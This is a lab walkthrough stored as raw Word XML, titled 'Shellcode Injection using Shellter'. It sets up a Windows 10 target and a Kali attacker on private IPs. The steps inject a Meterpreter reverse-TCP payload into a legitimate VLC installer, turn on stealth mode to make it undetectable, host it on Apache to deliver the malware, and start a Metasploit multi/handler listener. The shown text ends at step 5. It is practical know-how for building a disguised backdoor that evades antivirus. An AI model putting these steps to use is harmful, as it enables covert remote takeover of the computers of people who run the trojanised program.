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B56" w:rsidRPr="00E73D69" w:rsidRDefault="00163CEB" w:rsidP="007033AD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shellco</w:t>
      </w:r>
      <w:r w:rsidR="00A673FC">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">de Injection using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A673FC">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shellter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009A1D4E" w:rsidRPr="00E73D69" w:rsidRDefault="00163CEB" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2613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4E" w:rsidRPr="00E73D69" w:rsidRDefault="009A1D4E" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Machine </w:t>
      </w:r>
      <w:r w:rsidR="00163CEB" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(IP: 192.168.19.134</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E958F5" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E958F5" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacking Machine </w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(IP: 192.168.19.128)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A3C54" w:rsidRPr="00E73D69" w:rsidRDefault="003A3C54" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A1D4E" w:rsidRPr="00E73D69" w:rsidRDefault="009A1D4E" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OS: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidR="00163CEB" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00163CEB" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ro</w:t>
      </w:r>
      <w:r w:rsidR="00163CEB" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>64-bit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00163CEB" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OS: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A1D4E" w:rsidRPr="00E73D69" w:rsidRDefault="009A1D4E" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Computer Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mark</w:t>
      </w:r>
      <w:r w:rsidR="00163CEB" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lucido</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00163CEB" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Computer Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163CEB" w:rsidRPr="00E73D69" w:rsidRDefault="00163CEB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</w:p>
    <w:p w:rsidR="004F079D" w:rsidRPr="00E73D69" w:rsidRDefault="004F079D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sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Download a legitimate executable file to be use for the code injection. In our case, we will be using “vlcwin32.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F079D" w:rsidRPr="00E73D69" w:rsidRDefault="004F079D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noProof/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="1184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FE" w:rsidRPr="00E73D69" w:rsidRDefault="006F5AFE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</w:p>
    <w:p w:rsidR="006F5AFE" w:rsidRPr="00E73D69" w:rsidRDefault="006F5AFE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b/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r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On your Kali Linux, download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Shellter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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with the command below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5AFE" w:rsidRPr="00E73D69" w:rsidRDefault="006F5AFE" w:rsidP="007033AD">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F5AFE" w:rsidRPr="00E73D69" w:rsidRDefault="006F5AFE" w:rsidP="007033AD">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt-get install shelter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F5AFE" w:rsidRPr="00E73D69" w:rsidRDefault="006F5AFE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</w:p>
    <w:p w:rsidR="00163CEB" w:rsidRPr="00E73D69" w:rsidRDefault="00163CEB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To launch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Shellter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, just type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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shellter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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on the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E73D69" w:rsidRDefault="00163CEB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You will be required to enter the absolute path to the executable to make FUD. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163CEB" w:rsidRPr="00E73D69" w:rsidRDefault="00163CEB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Make sure to select “Auto” mode, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163CEB" w:rsidRPr="00E73D69" w:rsidRDefault="006F5AFE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noProof/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6692265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EB" w:rsidRPr="00E73D69" w:rsidRDefault="00163CEB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proofErr w:type="spellStart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lastRenderedPageBreak/>
        <w:t>Shellter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select “Y” for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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yes.The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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next prompt will require you to enter the payload, either a custom or a listed one. You should select a listed one by typing “L” unless you want to proceed with your own custom payload. Select the index position of the payload to use. We need a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Meterpreter_Reverse_TCP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, so we will have to go with “1.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163CEB" w:rsidRPr="00E73D69" w:rsidRDefault="00E73D69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noProof/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6692265" cy="4584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EB" w:rsidRPr="00E73D69" w:rsidRDefault="00163CEB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Enter LHOST and LPORT and press Enter. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Shellter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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will run to completion and request you to press Enter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163CEB" w:rsidRPr="00E73D69" w:rsidRDefault="00E73D69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noProof/>
          <w:color w:val="212529"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6692265" cy="3204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EB" w:rsidRPr="00E73D69" w:rsidRDefault="00163CEB" w:rsidP="007033AD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At this point, the executable you provid</w:t>
      </w:r>
      <w:r w:rsidR="00E73D69"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>ed had injected with shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66CC3" w:rsidRPr="00E73D69" w:rsidRDefault="00A66CC3" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E73D69" w:rsidRPr="00E73D69" w:rsidRDefault="00E73D69" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E73D69" w:rsidRPr="00E73D69" w:rsidRDefault="00E73D69" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E73D69" w:rsidRPr="00E73D69" w:rsidRDefault="00E73D69" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B27804" w:rsidRPr="00E73D69" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3</w:t>
      </w:r>
      <w:r w:rsidR="00B27804" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003A3C54" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
      <w:r w:rsidR="00E73D69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> demo purposes, move the code-injected executable file “vlcwin32.exe”</w:t>
      </w:r>
      <w:r w:rsidR="003A3C54" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="003A3C54" w:rsidRPr="00E73D69">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A3C54" w:rsidRPr="00E73D69">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A3C54" w:rsidRPr="00E73D69">
        <w:t>/www/html. Then start service apache2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007033AD" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E107FA" w:rsidRDefault="007033AD" w:rsidP="007033A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>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 4</w:t>
      </w:r>
      <w:r w:rsidR="00711E3D" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DF75F8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00E107FA" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tart service Apache2, a web server </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E107FA" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E107FA" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E107FA" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>typically enable request and view Web pages using Web browser applications such as Firefox, Opera, Chrome, or Internet Explorer.</w:t>
      </w:r>
      <w:r w:rsidR="00A66CC3" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> It will be use to deliver</w:t>
      </w:r>
      <w:r w:rsidR="00E107FA" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> the malware</w:t>
      </w:r>
      <w:r w:rsidR="00E40576" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly to our target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007033AD" w:rsidRPr="00E73D69" w:rsidRDefault="007033AD" w:rsidP="007033A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</w:p>
    <w:p w:rsidR="00366E25" w:rsidRPr="00E73D69" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr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Step 5</w:t>
      </w:r>
      <w:r w:rsidR="00366E25" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00366E25" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00366E25" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00366E25" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in quite mode (-q) and Listener (exploit/multi/handler).</w:t>
      </w:r>
      <w:r w:rsidR="00DF75F8" w:rsidRPr="00DF75F8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF75F8" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set the variables for our listener (exploit/multi/handler).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00366E25" w:rsidRPr="00E73D69" w:rsidRDefault="00DF75F8" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
